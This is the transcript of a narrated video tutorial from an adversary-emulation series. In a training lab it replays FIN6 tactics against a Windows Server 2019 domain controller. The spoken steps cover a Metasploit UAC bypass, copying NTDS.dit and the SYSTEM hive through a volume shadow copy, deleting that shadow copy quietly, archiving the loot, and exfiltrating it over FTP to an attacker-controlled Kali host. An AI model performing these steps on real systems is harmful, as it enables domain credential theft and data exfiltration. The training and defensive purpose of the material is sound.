How FIN6 Exfiltrates Files Over FTP

Hey guys, Hackisloit here back again with another video. Welcome back to the Adversary Emulation series. I apologize for the lag between uh the previous video and this one, but we're pretty much going to be continuing uh from where we left off which was uh you know the finix emulation plan. We had already performed uh or you know uh obtain initial access. Uh we also you know explored as part of that uh the various ways of creating um word macros or VBA macros for initial access and then uh in the previous video we you know explored active directory enumeration and the objective there you know based on the emulation plan was to stage this information for exfiltration. So in this video we're going to be you know continuing uh by taking a look at privilege escalation as per the emulation plan. Um and then staging a couple of additional files for exfiltration. Um these are you know just files that or information that we'll you know obtain through local enumeration but quite important and that require elevated privileges and then uh we'll pretty much be wrapping up the finics emulation plan by you know once we've staged the files we're going to be creating the archive um and then excfiltrating um over FTP. So, um, if you're new to this series, I highly recommend you take a look at, uh, you know, the series or the first video in the series. A link to that will be in the description section. And likewise, if you're unaware, this is your first time watching this series, we will be, uh, you know, going through this demonstration using um, you know, a set of labs on the Cyber Rangers platform. If you're new to Cyber Rangers, uh, you know, you can register for an account. It's app. cyberangers. com. A link will be in the description section. And it's absolutely free. And uh you want to navigate once you've created an account just navigate to the community or free section as you can see here and you'll find the MIT attack defender adverse emulation fundamentals playlist of labs. So absolutely free and uh the finix emulation plan is pretty much iterated in lab 1. 3 which is what we're going to be using. So you can just click on that lab and start it up. you'll be provided with access to your own Kali Linux system and the target domain controller which is running Windows Server 2019. So uh link to the lab and playlist of labs will also be in the description section. But you know let's not waste any more time. So I've pretty much um I'm going to be continuing from where we left off. We had already staged or performed active directory enumeration and uh you know we had staged all of the um the files um you know containing the information we've enumerated in the uh in the public users home directory. So that's where we are going to be continuing off from. All right. So um as you can see I have uh access or I have obtained already have access to the um to the target system and uh I've already performed you know everything that we did up to the last point um in the previous video. So these are all the files that we had staged. So you know pretty much adumeration when we saved the info in text files. So um as I mentioned in the previous video um if you follow the emulation plan um it involved executing opening the macro enabled uh or the you know macro document we used for initial access with elevated privileges. So you essentially you know launch word as admin and then open the document which would mean you get elevated privileges in any case. uh but we didn't follow that and uh you know the reason for that uh will become apparent you know if you want to you know take a look at a more realistic priv uh privilege escalation vector then you know that's what we'll be doing. So I'll just uh terminate out of my PowerShell shell here and uh you know if we follow the emulation plan uh I'll just zoom in so you can see this a little bit better. Uh so you know it says to type in get system and you'll see that fails. All right. So, we will put this session in the background and I will now um I will search for the bypass UAC models uh module, sorry. And the one we're looking for, the one that works on Windows Server 2019 is this one right over here, the bypass UAC com hijack. So, I'll say use module 12. Um and then uh we will uh All right. So, no payload, show options. Let's see. Um let's check the architecture of my session. It's 64bit and I think uh so if we say set payload to Windows uh x64 uh let's see um x64 whether that will bring up anything. Okay. No. So this is um this is one of the issues with

the new version of um of metas-loit. And what I'll do, I'll just switch into full screen so it's uh clearer for you. So this is something that's uh I wouldn't say it's an issue in um in Metas-Ploit or MSF6, but um with certain older modules that didn't have the architecture specified, you can only set um uh 32bit interpreter payload. So you know if I say um you know in this case Windows uh you can see that you know there's not going to be the option for um the 64-bit interpreter session which I need because my um the current session I have is 64bit uh or that of you know 64-bit architecture. So what we'll need to do is uh we'll need to modify this exploit module to support that. So I'll just uh go ahead and open up a new terminal and I'll use uh Vim to modify the exploit module Ruby file. So pseudo Vim um and I'll say Etsy uh actually no that's going to be stored under user share metasloit framework um exploits. No, no. It's going to be under modules exploits. Uh we're going to say Windows and then um local I believe uh local and then we're going to say uh bypass it should be in this uh in this folder I think. Let's see. Um so under local let's see what's in here. Uh so bypass UAC com it should be in here. So we'll just uh try and so we'll say bypass UAC. Uh what we're looking for is the com hijack. So it's just underscorecom uh hijack ruby and uh we'll just open this up and let's go all the way to where the module info is specified. So I will say uh right over here. So platform as I s as I suspected there's no architecture. So what we need to do in order to use 64-bit interpreter payload is uh just modify this here and uh I'm just going to switch to a different uh browser cuz uh this is a bit slow. So just give me a second. All right, that should be much better. So under platform I will uh just say over here uh this would be architecture I'm pretty sure and then uh we then need to say uh we'll say both. So architecture um we'll say x 86 and then I believe it's uh the same for our architecture x64. So we'll just close that up there and then do that there and then write and quit and then we'll go back into metas-loit. And now we need to reload all this will reload the module so we can you know that they load with the new configuration. Uh, by the way, the only reason why I'm showing you this is because you, if you're using the latest version of Metas-Ploit, you're going to experience this issue quite a bit with some of the older modules that didn't have the architecture explicitly defined. Um, and you know, it's not that they don't support or you can't use different payloads, you know, different uh payloads with different architectures. It's really, you know, that they are undefined and there there's some strictures within metas-ploit that prevent that. So now, um, I'll just say search bypass UAC. I know I already have the module loaded. Uh but we want uh where is it? So com hijack. It's still not showing you know the supported payloads. But now if I say set payload windows uh x64 uh there we are. Fantastic. My interpreter reverse TCP. Okay. So session ID is one. So show options. Um so I'll set the L port to something different. uh so I can differentiate. So we'll say set session one and then exploit and this should allow us to elevate our privileges and get an elevated interpreter session on the target. So um let's see if this works. Uh hopefully it does. Uh or I need to set the target option maybe. Probably uh but yeah, we'll just let this run and see if we get a session. All right, just had to run it one more time. Um, and so there we are.

We get a interpreter session. So this info we can see target DC. It's 64bit. And now we can sort of proceed with staging some additional files uh that uh you know require elevated privileges. One of which is to create a volume shadow copy of the entire C drive. So what is a volume shadow copy? A volume shadow copy is uh pretty much a snapshot if you will of uh um a you know set of files in this particular case you know files within the C drive. Um and uh the advantage with this is you know we uh the advantage of creating a volume shadow copy is because we can access uh or copy files um even you know when the windows specific files are being used or when the operating system is running. So it's sort of like taking a snapshot of the Windows system, right? So in order to do this, you obviously need elevated privileges and uh I'll just navigate to see users uh public. I'll open up a shell. Uh so you know if I say who am I here? So who am I uh priv like so yeah you can see we have that there. In any case, uh we can use vsss um admin and we're going to say create uh shadow. So create shadow and then for uh for C. I think we just need to specify the drive here. So 4 C and it's going to create it. And pay attention to the shadow copy details. So you have the copy ID and then the volume name. So we're going to need the volume name here. uh we don't just want the actual name itself but you know pretty much the entire path here. So we're now going to copy the uh ntds uh file um from the shadow copy and because we have the directory here uh into our current working directory which is c users public. So we're just going to copy this here uh like so. And we're now going to say uh copy and uh we want to paste this in here and say we want uh Windows um NTDS and uh NTDS uh dip. Um and then we want to copy it to users uh let's see if I'm typing that correctly. So, uh, my bad. I've made a mistake there. So, uh, we're just going to say copy, um, Windows NTDS. Um, and then NTDS. It. Uh, and we'll copy it into C users public. Um, and we'll say ad ntds. We'll maintain the uh file uh prefix AD because that will be sort of important uh when we'll be compressing the files or staging them for exfiltration. But I'll hit enter. So we should see it now. Um if I can actually find it in here. Uh one second. Ad uh NT. Uh we should see it here. There we are. So we have it right over here. And uh now uh we can also copy the uh registries uh the system registry hive and the system configuration file uh into you know current working directory. So that can be easily done by saying oh that's weird. Uh so we can say reg save uh hklm uh system. So, HK local machine system and then C uh users public and uh we'll just call it ad cis uh regge. Okay. And then we'll say copy uh we're going to get the shadow copy name again which I believe I'd already copied. So, uh, Windows system 32, uh, config and then it's, uh, system, I believe. Uh so system and then we want to copy it to C uh users public ad and then system uh cfg. All right. So that's copied here and you know we should have everything we need. Uh one thing you can also do don't think it's explicitly part of the emulation plan uh is to you know delete the volume um the shadow volume uh you know uh sorry not

the shadow volume the shadow copy that we created. Um uh and you know you can easily do that by saying VSSs uh admin and then delete uh shadows uh we're going to say shadow is equal to you need the volume ID. So you can do that if you want to. Let's actually do it here. Where's the ID? Uh so in this case we actually need the ID here. Uh so like so. Um just going to copy that there. So, shadow volume ID and then we can say do this quietly. So, you know, just some stealth uh over here. Uh D, that's weird. Uh so, V SS admin delete shadows. Uh shadow is equal to the volume ID and then I said quiet. Uh let's see. I need to specify the ID with brackets. So we'll say vsss admin delete shadows uh shadow equal to uh sorry let me just put that in there like so. I think that is what I was missing. Uh yeah, I think that's done it. Okay, so we now move on to the next step which is you know we've completed local enumeration or discovery and we've collected all the files that uh we require. Now um fin 6 archives all their collected data using a uh renamed command line version of uh the sevenzip you know executable or tool. Um, and you know it's already set up on the Windows system. You know, it's part of the environment, so you don't have to do it. But what they what it's called or what is known to be called is 7. exe. And they typically do the following. So MX3 is uh, you know, uh, type of compression there. And then they, you know, in this case, they've been known to call stuff like AD. 7zip. And what we want to compress is any file with uh the prefix adore. So we'll use the wild card operator and hit enter. All right. So there we are. It's created uh the sevenzip archive which we now can um we can now exfiltrate. So we're now moving on to exfiltration. So uh the last task in this emulation plan is to exfiltrate what we've collected and more specifically that sevenzip archive. So you know at the time when this lab was created the emulation plan um you know called for the use of plink. exe. So you know uh based on what is known they have been known to excfiltrate over the web primarily. uh but that particular emulation plan or the plan that was used to build this lab did not clarify on you know the technique uh the procedures to perform the file transfer or you know the procedures to emulate with regards to performing the file transfer via web service. So instead of simply using you know an alternative uh procedure we can pretty much uh try and utilize another you know technique or procedure uh in this case really just a protocol. Um and what we're going to be doing is taking a look at how to exfiltrate via FTP. So the first thing we need to do is set up an FTP server on the Kali Linux system which we can easily do. Um, so I'm currently within the lab 1. 3 folder here on the Kali Linux system. And we can use uh Python 3 the module uh pi FTPD uh FTP uh lib I believe it's called. And then uh we'll say port 21. The directory is home um attacker and adversary emulation and then labs. We'll save it in lab 1. 3. So lab uh 1. 3 and uh we'll set a user and we'll just call it FTP user. And of course a real adversary will not keep things this simple. And then the password we'll just call it FTP pass because I know that uh I will forget this. So that'll set up the FTP server on the Kali Linux system. And now um we can go onto the Windows system and we will be utilizing the Windows FTP client. Now you know Windows FTP client is interactive which means we can't use a interpreter session. We need to have a native shell which we do. So in order to make this easy um we'll create you know an FTP file containing the commands or arguments that we want the FTP server to execute. In this case connect to the FTP sorry the FTP client

to execute. In this case, we want the um FTP client on Windows to uh reach out to the FTP server on the Kali Linux system authenticate and then you know pretty much put or upload uh the AD. 7zip um archive that uh you know we created here that contains all the information that we enumerated or collected. So in order to do this we're just going to use a text file and uh you know we'll put in our FTP arguments. So the first thing we need to do is say open 192 168 125 and 103. So the Kal Linux IP address which is hosting the FTP server and we'll just save it in FTP. txt. Uh we then need to authenticate. So we say FTP user that's going to be the username and we're just going to add it to um FTP. txt. So just uh not overwrite the file, add it as an additional argument. And then we're going to say echo FTP pass FTP. txt. Uh and then we want to say echo uh put this is where we now upload the archive or the seven zip file. And we want to say um FTP. txt. And then we also want to terminate the connection by saying by you know standard FTP commands or syntax FTP. txt hit enter. And now if I say type FTP. txt you can see that that's there. So we can now utilize the Windows FTP client and specify uh or you know pretty much pass our text file that contains the commands by saying FTP uh s and then we say FTP. XT txt. Hit enter. And it looks like it worked. So we can go into the FTP server here. Uh let's see. Uh FTP logged in stored the following. And now if we check the folder, you know, uh on the Kali Linux system, Adverse emulation labs lab 1. 3, we have AD. 7zip. I don't think we can extract it on this system cuz we don't have the sevenzip utility. I think we do. Um but this will contain all the files and um you know if we switch over to the Windows system um we'll be able to see um the archive created and what is stored inside. So let me actually do that. I'm just going to switch over to the Windows system. All right. So I'm on the Windows system now and uh I'll just open up a file explorer. So where did we save it? Um see users um public And there we are. So I think uh Windrock can actually extract it. So you can see that it is a functional archive. So in here we should have everything we So we have the system um you know the system registry hive and configuration ad uh NTDS file here um and you know all the info that we enumerated. So you know we can open this up here where we enumerated computers um so on and so forth. So this is you know this sort of represents the first phase of um you know the emulation plan which is uh what finix typically does. They you know once they gain initial access they perform enumeration they exfiltrate uh the information that they've uh gathered or collected uh about the target environment and then they move on to stage two which you know is not going to be part of what we're emulating. But with that being said, uh that brings us to the end of this video and the uh you know emulating FIN 6 series. Uh we're now going to be moving on to emulating APT29. So there's going to be a lot of advanced stuff in there ranging from you know a resource development payloads. Uh we're going to be using a PDF and a link file or a shortcut for initial access. So it's going it's pretty much going to encompass everything you guys wanted. But remember this uh this first series on fin 6 was meant to be you know relatively simple. Uh but uh you know hopefully it sets the stage for um the other series. In any case uh as I said that's going to be it for this video. If you enjoyed this video, found value in it, please leave a like down below. If you have any questions, comments, suggestions, leave them in the comment section. And as always, all the links uh and links to the labs will be in the description section. Uh, but yeah, that brings us to the end and I'll be seeing you guys in the next video.